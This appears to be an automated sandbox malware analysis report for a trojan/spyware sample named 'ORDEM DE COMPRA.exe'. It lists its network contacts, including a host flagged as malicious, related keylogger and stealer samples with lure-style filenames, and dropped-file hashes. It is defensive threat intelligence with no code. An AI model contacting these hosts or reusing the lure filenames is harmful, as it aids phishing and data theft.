http://reallyfreegeoip.org | AddInProcess32.exe, 00000005.00000002.4523823205.0000000003216000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.4523823205.000000000325C000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.4523823205.0000000003223000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.4523823205.000000000318D000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.4523823205.000000000326C000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.4523823205.0000000003230000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.4523823205.0000000003208000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://reallyfreegeoip.org | AddInProcess32.exe, 00000005.00000002.4523823205.0000000003175000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.4523823205.0000000003216000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.4523823205.000000000325C000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.4523823205.0000000003223000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.4523823205.00000000031B8000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.4523823205.000000000326C000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.4523823205.0000000003230000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.4523823205.0000000003208000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://upx.sf.net | Amcache.hve.9.dr | false | URL Reputation: safe | unknown
http://checkip.dyndns.org | AddInProcess32.exe, 00000005.00000002.4523823205.0000000003175000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.4523823205.0000000003216000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.4523823205.000000000325C000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.4523823205.0000000003223000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.4523823205.00000000031B8000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.4523823205.000000000326C000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.4523823205.0000000003169000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.4523823205.0000000003230000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.4523823205.0000000003208000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.microsoft. | AddInProcess32.exe, 00000005.00000002.4523823205.000000000318D000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://checkip.dyndns.com | AddInProcess32.exe, 00000005.00000002.4523823205.0000000003175000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.4523823205.0000000003216000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.4523823205.000000000325C000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.4523823205.0000000003223000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.4523823205.000000000326C000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.4523823205.0000000003230000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.4523823205.0000000003208000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | AddInProcess32.exe, 00000005.00000002.4523823205.00000000030B1000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://scratchdreams.tk | AddInProcess32.exe, 00000005.00000002.4523823205.000000000326C000.00000004.00000800.00020000.00000000.sdmp | false | 18%, Virustotal; Avira URL Cloud: malware | unknown
https://reallyfreegeoip.org/xml/ | ORDEM DE COMPRA.exe, 00000000.00000002.2184297961.000001FBE99FC000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.4523823205.0000000003175000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.4521934440.0000000000402000.00000040.00000400.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
132.226.8.169 | checkip.dyndns.com | United States | 16989 | UTMEMUS | false
188.114.97.3 | reallyfreegeoip.org | European Union | 13335 | CLOUDFLARENETUS | true
              Joe Sandbox version:40.0.0 Tourmaline
              Analysis ID:1446502
              Start date and time:2024-05-23 15:12:10 +02:00
              Joe Sandbox product:CloudBasic
              Overall analysis duration:0h 8m 31s
              Hypervisor based Inspection enabled:false
              Report type:full
              Cookbook file name:default.jbs
              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:16
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • HCA enabled
              • EGA enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Sample name:ORDEM DE COMPRA.exe
              Detection:MAL
              Classification:mal100.troj.spyw.expl.evad.winEXE@11/10@4/2
              EGA Information:
              • Successful, ratio: 50%
              HCA Information:
              • Successful, ratio: 59%
              • Number of executed functions: 215
              • Number of non-executed functions: 48
              Cookbook Comments:
              • Found application associated with file extension: .exe
              • Override analysis time to 240000 for current running targets taking high CPU consumption
              • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
              • Excluded IPs from analysis (whitelisted): 104.208.16.94
              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com, onedsblobprdcus16.centralus.cloudapp.azure.com
              • Execution Graph export aborted for target ORDEM DE COMPRA.exe, PID 1756 because it is empty
• Not all processes were analyzed, report is missing behavior information
              • Report size exceeded maximum capacity and may have missing behavior information.
              • Report size exceeded maximum capacity and may have missing disassembly code.
              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
              • Report size getting too big, too many NtCreateKey calls found.
              • Report size getting too big, too many NtOpenKeyEx calls found.
              • Report size getting too big, too many NtQueryValueKey calls found.
              • Report size getting too big, too many NtReadVirtualMemory calls found.
              • Report size getting too big, too many NtSetInformationFile calls found.
Time | Type | Description
09:13:01 | API Interceptor | 20x Sleep call for process: powershell.exe modified
09:13:03 | API Interceptor | 11307945x Sleep call for process: AddInProcess32.exe modified
09:13:07 | API Interceptor | 1x Sleep call for process: WerFault.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
Match: 132.226.8.169
• z25BNjJ88767909876500h.exe | malicious | PureLog Stealer, Snake Keylogger | checkip.dyndns.org/
• documents_24.5.13YTKargo.pdf.exe | malicious | PureLog Stealer, Snake Keylogger | checkip.dyndns.org/
• U prilogu je nova lista narudzbi.exe | malicious | Snake Keylogger | checkip.dyndns.org/
• list of items.exe | malicious | PureLog Stealer, Snake Keylogger | checkip.dyndns.org/
• DEKONT.exe | malicious | PureLog Stealer, Snake Keylogger | checkip.dyndns.org/
• VI3 Operation Guide_tech Info versionfdp.exe | malicious | Agent Tesla, AgentTesla | checkip.dyndns.org/
• request-2.doc.exe | malicious | Agent Tesla, AgentTesla | checkip.dyndns.org/
• Purchase Order.exe | malicious | Snake Keylogger | checkip.dyndns.org/
• FGT5000800000.exe | malicious | PureLog Stealer, RedLine, Snake Keylogger | checkip.dyndns.org/
• z52OURO08765.exe | malicious | PureLog Stealer, RedLine, Snake Keylogger | checkip.dyndns.org/
Match: 188.114.97.3
• WRnJsnI1Zq.exe | malicious | DCRat, PureLog Stealer, zgRAT | objectiveci.top/pythonpacketGamebigloadprivateCentral.php
• http://hjkie5.pages.dev/ | malicious | Unknown | hjkie5.pages.dev/
• 56882720_50174358_2024-05-23_203027.xls | malicious | Unknown | qr-in.com/GDKZCby
• Enquiry No. 2421005.xla.xlsx | malicious | Unknown | qr-in.com/atBVKxq
• 56882720_50174358_2024-05-23_203027.xls | malicious | Unknown | qr-in.com/GDKZCby
• file.exe | malicious | Unknown | wagner3.net/admin
• Product Listsd#U0334r#U0334o#U0334w#U0334..exe | malicious | FormBook | www.sba99prag.com/pshj/
• ORDIN.xls | malicious | Unknown | qr-in.com/HDYwZbx
• ORDIN.xls | malicious | Unknown | qr-in.com/HDYwZbx
• SSDQ115980924.exe | malicious | FormBook | www.ilodezu.com/z48v/
Match | Associated Sample Name / URL | Detection | Threat Name | Context
Match: reallyfreegeoip.org
• Invoice.exe | malicious | Snake Keylogger | 188.114.97.3
• z64PEDIDODECOMPRAURGENTE___s___x___l___x____.exe | malicious | Snake Keylogger | 188.114.96.3
• z25BNjJ88767909876500h.exe | malicious | PureLog Stealer, Snake Keylogger | 188.114.96.3
• FACT45780987600h.exe | malicious | PureLog Stealer, Snake Keylogger | 188.114.97.3
• utradvices.scr.exe | malicious | Snake Keylogger | 188.114.96.3
• BANKOVN#U00cd SWIFT pdf.exe | malicious | Snake Keylogger | 188.114.96.3
• z51__________________________________.exe | malicious | Snake Keylogger | 188.114.96.3
• contract.exe | malicious | Snake Keylogger | 188.114.96.3
• z46PEDIDODECOMPRAURGENTE___F__D__P___.exe | malicious | Snake Keylogger | 172.67.177.134
• z13FAT9654578987.exe | malicious | PureLog Stealer, Snake Keylogger | 172.67.177.134
Match: scratchdreams.tk
• Invoice.exe | malicious | Snake Keylogger | 188.114.96.3
• z64PEDIDODECOMPRAURGENTE___s___x___l___x____.exe | malicious | Snake Keylogger | 188.114.96.3
• z25BNjJ88767909876500h.exe | malicious | PureLog Stealer, Snake Keylogger | 188.114.96.3
• FACT45780987600h.exe | malicious | PureLog Stealer, Snake Keylogger | 188.114.97.3
• utradvices.scr.exe | malicious | Snake Keylogger | 188.114.97.3
• BANKOVN#U00cd SWIFT pdf.exe | malicious | Snake Keylogger | 188.114.96.3
• z51__________________________________.exe | malicious | Snake Keylogger | 188.114.96.3
• contract.exe | malicious | Snake Keylogger | 188.114.96.3
• z46PEDIDODECOMPRAURGENTE___F__D__P___.exe | malicious | Snake Keylogger | 104.21.27.85
• z13FAT9654578987.exe | malicious | PureLog Stealer, Snake Keylogger | 172.67.169.18
Match: checkip.dyndns.com
• Invoice.exe | malicious | Snake Keylogger | 193.122.6.168
• z64PEDIDODECOMPRAURGENTE___s___x___l___x____.exe | malicious | Snake Keylogger | 158.101.44.242
• z25BNjJ88767909876500h.exe | malicious | PureLog Stealer, Snake Keylogger | 132.226.8.169
• FACT45780987600h.exe | malicious | PureLog Stealer, Snake Keylogger | 158.101.44.242
• z70ORDENDECOMPRAURGENTE___s___x___l___x____.exe | malicious | Snake Keylogger | 158.101.44.242
• utradvices.scr.exe | malicious | Snake Keylogger | 158.101.44.242
• BANKOVN#U00cd SWIFT pdf.exe | malicious | Snake Keylogger | 158.101.44.242
• z51__________________________________.exe | malicious | Snake Keylogger | 132.226.247.73
• contract.exe | malicious | Snake Keylogger | 193.122.6.168
• z46PEDIDODECOMPRAURGENTE___F__D__P___.exe | malicious | Snake Keylogger | 193.122.6.168
Match | Associated Sample Name / URL | Detection | Threat Name | Context
Match: CLOUDFLARENETUS
• http://chocolatefashiononline.com | malicious | Unknown | 104.19.178.52
• rPurchaseOrderPO05232024.exe | malicious | AgentTesla, GuLoader | 104.26.13.205
• https://lnk.sk/mzoy | malicious | Unknown | 172.67.176.2
• https://lnk.sk/twr3 | malicious | Unknown | 104.21.48.17
• COMMANDE.EXE.exe | malicious | DBatLoader, FormBook | 104.21.5.109
• t3h7DNer1Q.exe | malicious | AsyncRAT, DcRat | 104.16.185.241
• https://docs.google.com/forms/d/e/1FAIpQLSeRYIPr_Xs8SxtWD9VaAhgsz9aibS_bijyTwdbidiIQ4ngVlQ/viewform?embedded=true&entry.1325074572=http%3A%2F%2Fr.smtp.euro-symbiose.fr%2Ftr%2Fcl%2Fqrjz6G3WMajAukEuXu-N0Qebu__8ljHwQjs84-vbNFkstMs8BrqGB6auM8cV52vdc-z8kda-O1XzLDMdp-o1VJ_xiAbOzr9v5pxwTGj0Dst_LdwxxKSPofjHdg7nt8IDlgUJ3uTEcfUBoqUeYZ1z6UfsaMJ-LJXtWMT4Mwb9atjObh_1JANJ5jvL-GurRI94WpyXTvnXhmqNG1ThqZzYQSaX5jfeHHDV6kb8kSgWbW5xuXgTilqIdc91eM30NL2GhrRlNADqergaHf7cyAh4WnSBK&entry.731640200=build-verify+URL%3A+build+UrlParams%3A+build-verify+URL%3A+get+URL%3A+decrypt%3A+base64+decode%3A+illegal+base64+data+at+input+byte+280 | malicious | Unknown | 1.1.1.1
• RE Fasthosts - Payment Failed.eml | malicious | Outlook Phishing, HTMLPhisher | 104.18.10.14
• https://url.uk.m.mimecastprotect.com/s/pk4ACO8rYSq23vcE1w2J | malicious | Unknown | 188.114.97.3
• ELECTRONIC RECEIPT_Rockwool.html | malicious | Unknown | 104.17.25.14
Match: UTMEMUS
• yzKJORP7Q4.elf | malicious | Mirai, Moobot | 132.192.117.117
• 4rg5Y5MHO8.elf | malicious | Mirai, Moobot | 132.192.117.117
• https://fm.solewe.com/?dl=1bf2e18efc6c3969c16b88a11bd91a04 | malicious | Unknown | 132.226.214.62
• z25BNjJ88767909876500h.exe | malicious | PureLog Stealer, Snake Keylogger | 132.226.8.169
• z51__________________________________.exe | malicious | Snake Keylogger | 132.226.247.73
• documents_24.5.13YTKargo.pdf.exe | malicious | PureLog Stealer, Snake Keylogger | 132.226.8.169
• NOVO_PEDIDO_DE_COMPRA_____pdf.exe | malicious | Snake Keylogger | 132.226.247.73
• U prilogu je nova lista narudzbi.exe | malicious | Snake Keylogger | 132.226.8.169
• list of items.exe | malicious | PureLog Stealer, Snake Keylogger | 132.226.8.169
• FAHJ98766700008022.exe | malicious | PureLog Stealer, Snake Keylogger | 132.226.247.73
Match | Associated Sample Name / URL | Detection | Threat Name | Context
Match (JA3 TLS client fingerprint): 54328bd36c14bd82ddaa0c04b25ed9ad
• t3h7DNer1Q.exe | malicious | AsyncRAT, DcRat | 188.114.97.3
• f9oE743c23.exe | malicious | LimeRAT | 188.114.97.3
• Invoice.exe | malicious | Snake Keylogger | 188.114.97.3
• DEsFjZJcR0.exe | malicious | AsyncRAT | 188.114.97.3
• SHIPPING DOCUMENT.PDF.exe | malicious | Unknown | 188.114.97.3
• bMAplZixhH.exe | malicious | Njrat | 188.114.97.3
• z64PEDIDODECOMPRAURGENTE___s___x___l___x____.exe | malicious | Snake Keylogger | 188.114.97.3
• z25BNjJ88767909876500h.exe | malicious | PureLog Stealer, Snake Keylogger | 188.114.97.3
• LsvjDwAj7O.exe | malicious | AsyncRAT | 188.114.97.3
• FACT45780987600h.exe | malicious | PureLog Stealer, Snake Keylogger | 188.114.97.3
Match (JA3 TLS client fingerprint): 3b5074b1b5d032e5620f69f9f700ff0e
• rPurchaseOrderPO05232024.exe | malicious | AgentTesla, GuLoader | 188.114.97.3
• ASCD0001 INQ9829......pdf.exe | malicious | AgentTesla | 188.114.97.3
• Invoice.exe | malicious | Snake Keylogger | 188.114.97.3
• msimg32.dll | malicious | Remcos | 188.114.97.3
• https://url10.mailanyone.net/scanner?m=1s9Mri-0007hx-3T&d=4%7Cmail%2F90%2F1716287400%2F1s9Mri-0007hx-3T%7Cin10g%7C57e1b682%7C12862802%7C10019077%7C664C7952D245399BD4B163183C53C253&o=%2Fphte%3A%2Fdtsseedrontec.iuconsctomat%2Fku.&s=X3gWuPbJRU1Tmui7Qt2w30qEumE | malicious | HTMLPhisher | 188.114.97.3
• INVOICE.js | malicious | AgentTesla | 188.114.97.3
• Zam#U00f3w nr 90016288247_ ZNG_1406_MG_2024_004782922.pdf.exe | malicious | AgentTesla | 188.114.97.3
• NEW ORDER.exe | malicious | AgentTesla | 188.114.97.3
• dfzesJIgdr.exe | malicious | RedLine, Vidar | 188.114.97.3
• pro-forma invoice.xlsm.exe | malicious | AgentTesla, PureLog Stealer | 188.114.97.3
              No context
              Process:C:\Windows\System32\WerFault.exe
              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
              Category:dropped
              Size (bytes):65536
              Entropy (8bit):1.1679389495550048
              Encrypted:false
              SSDEEP:192:d2ZCgzTu0UnU9aWBH+Dm8OIdzuiFUZ24lO88At2:gC8TVUnU9amH+KIzuiFUY4lO8b
              MD5:DF6396A88616A83B02E110554B0F153C
              SHA1:69F85B24B900905334F1287D4FEBD4214A8045DD
              SHA-256:BE73410D8F9CDE838C31F6F0EEE87C199E27FBC9D837B177CA415FC69FAE3FEF
              SHA-512:41BBEC05FB51CE5273FE2D5F7F42AEFFCAA20F507EB825696B2FFB2B4F21BF656FA957F6DAC6BBAB2AC05441EE63B96B78F366E84272ADC88B01CB5A1F029F30
              Malicious:false
              Reputation:low
              Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.0.9.4.3.5.8.1.0.2.5.8.5.9.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.0.9.4.3.5.8.2.1.5.0.8.5.6.1.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.e.4.2.7.1.9.8.-.6.5.5.7.-.4.3.e.4.-.8.d.3.3.-.1.1.f.6.0.1.e.d.8.5.6.b.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.6.7.d.0.0.c.e.-.c.7.6.c.-.4.0.0.9.-.a.1.2.1.-.1.9.b.9.f.a.f.b.a.9.9.0.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.O.R.D.E.M. .D.E. .C.O.M.P.R.A...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.U.n.o.q.u.n.o.m.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.6.d.c.-.0.0.0.1.-.0.0.1.5.-.d.2.e.f.-.a.7.e.c.1.2.a.d.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.0.e.2.4.6.1.2.7.d.9.2.9.d.2.3.2.9.1.0.3.1.0.2.c.d.e.8.f.1.b.9.f.0.0.0.0.0.0.0.0.!.0.0.0.0.8.c.b.d.3.3.b.3.c.f.5.1.9.8.0.7.b.2.c.9.8.6.f.7.f.b.e.3.d.a.a.e.4.1.7.5.5.9.5.f.!.O.R.D.E.M. .D.E. .
              Process:C:\Windows\System32\WerFault.exe
              File Type:Mini DuMP crash report, 16 streams, Thu May 23 13:13:01 2024, 0x1205a4 type
              Category:dropped
              Size (bytes):514232
              Entropy (8bit):3.383319972707714
              Encrypted:false
              SSDEEP:6144:QpRHAPgCy66SCKsMegvqA3QhG3uOkCb47zSS:QpseMZqUQrCo
              MD5:268DEC99D6D8F574D8248CEF30EFD244
              SHA1:058E76BA93EDFD3CC8D537F55B506C2062D16023
              SHA-256:B878B4F6F9730E649982F8DB85A8CAC94EBD20C76D36EF17A798F3D3347E554D
              SHA-512:1285D868F24BFF33F020601D3691DEF8BA0E25C119DD5B9826C02C10C99D3E559F650D35E8E1DD3892C0A81E0D8B2A69D9E6FE39FC9FF11FD455AD477F1ABB88
              Malicious:false
              Reputation:low
              Preview:MDMP..a..... ........@Of............t.......................$...H&.......5..l&......Tt.............l.......8...........T............9...............\...........]..............................................................................eJ.......^......Lw......................T............@Of.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...........................................................................................................................................................................................................................................................................................................................................................................................................................
              Process:C:\Windows\System32\WerFault.exe
              File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
              Category:dropped
              Size (bytes):8626
              Entropy (8bit):3.7142593366814274
              Encrypted:false
              SSDEEP:192:R6l7wVeJeKyY6Y2D+mJ31gmfeLGprG89bjUWfMhm:R6lXJLd6YiJlgmfeLcjlfH
              MD5:A71F4FF74D27517E98C0350DFD51B5AE
              SHA1:855D4AD75C5D5FE0B58E85A5A1C2B6175822D763
              SHA-256:06A34A4A478EBC248E61A1D55EF8D537A1D40AD4F5E0C7C29FED3971EC641453
              SHA-512:4BCF515BADC3F5C44BFFA96B0A7D93B0D89783893CD1FB789282175CD51F42131E3F237990341525ECF4C35A292EECB8B19266C9B45875E7B09BA3CCFD38049A
              Malicious:false
              Reputation:low
              Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.1.7.5.6.<./.P.i.
              Process:C:\Windows\System32\WerFault.exe
              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):4785
              Entropy (8bit):4.541976125176462
              Encrypted:false
              SSDEEP:48:cvIwWl8zs0Jg771I9UPWpW8VYLHPYm8M4JL9nWDFByq85XNvD6sKx3xwd:uIjfyI7Pe7V8HSJxwGLJShwd
              MD5:9A244CEB80E44FF1151F9A77A89230B2
              SHA1:AE9F688746E2BC75C1D1F963D9523832ACA58E35
              SHA-256:114E0A39C6899CC76C88B7436519DCF9F9CA30781C5FA63FC9ED2DDEF0160920
              SHA-512:0BD93E14A6B1823DCFB5377B4F93252435C8C27978DD6BF8E695D716769994AB0D6A0F58309786BD3A8A33F3ABF9D97DE346A01EAAA987DBAF36696941D34AE5
              Malicious:false
              Reputation:low
              Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="335775" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              File Type:data
              Category:dropped
              Size (bytes):64
              Entropy (8bit):1.1940658735648508
              Encrypted:false
              SSDEEP:3:NlllulJnp/p:NllU
              MD5:BC6DB77EB243BF62DC31267706650173
              SHA1:9E42FEFC2E92DE0DB2A2C9911C866320E41B30FF
              SHA-256:5B000939E436B6D314E3262887D8DB6E489A0DDF1E10E5D3D80F55AA25C9FC27
              SHA-512:91DC4935874ECA2A4C8DE303D83081FE945C590208BB844324D1E0C88068495E30AAE2321B3BA8A762BA08DAAEB75D9931522A47C5317766C27E6CE7D04BEEA9
              Malicious:false
              Reputation:moderate, very likely benign file
              Preview:@...e.................................X..............@..........
              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              File Type:ASCII text, with no line terminators
              Category:dropped
              Size (bytes):60
              Entropy (8bit):4.038920595031593
              Encrypted:false
              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
              MD5:D17FE0A3F47BE24A6453E9EF58C94641
              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
              Malicious:false
              Reputation:high, very likely benign file
              Preview:# PowerShell test file to determine AppLocker lockdown mode
              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              File Type:ASCII text, with no line terminators
              Category:dropped
              Size (bytes):60
              Entropy (8bit):4.038920595031593
              Encrypted:false
              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
              MD5:D17FE0A3F47BE24A6453E9EF58C94641
              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
              Malicious:false
              Preview:# PowerShell test file to determine AppLocker lockdown mode
              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              File Type:ASCII text, with no line terminators
              Category:dropped
              Size (bytes):60
              Entropy (8bit):4.038920595031593
              Encrypted:false
              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
              MD5:D17FE0A3F47BE24A6453E9EF58C94641
              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
              Malicious:false
              Preview:# PowerShell test file to determine AppLocker lockdown mode
              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              File Type:ASCII text, with no line terminators
              Category:dropped
              Size (bytes):60
              Entropy (8bit):4.038920595031593
              Encrypted:false
              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
              MD5:D17FE0A3F47BE24A6453E9EF58C94641
              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
              Malicious:false
              Preview:# PowerShell test file to determine AppLocker lockdown mode
              Process:C:\Windows\System32\WerFault.exe
              File Type:MS Windows registry file, NT/2000 or above
              Category:dropped
              Size (bytes):1835008
              Entropy (8bit):4.469060473050792
              Encrypted:false
              SSDEEP:6144:PzZfpi6ceLPx9skLmb0fVZWSP3aJG8nAgeiJRMMhA2zX4WABluuNcjDH5S:bZHtVZWOKnMM6bFpuj4
              MD5:824F76B1F3C319C0C5AE885D4BB3750B
              SHA1:02CA8C54C3FDEBDD6108A3F338CDD3334F52DFA8
              SHA-256:5E9513DA01DFFD3001A338DBC15B42264A3DC8565E791E78AEB74B5207947723
              SHA-512:7240728A66C44B436D5FD1CCB1B5EEFAF8199D1FB3B8BCFFE9F1F4E1C0E7C20979CFD90A4B1CA76B292ECA6A8FAB0F68489F4A60B17CEB3112FA8DA99A3F3218
              Malicious:false
              Preview:regfH...H....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtmv....................................................................................................................................................................................................................................................................................................................................................M..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
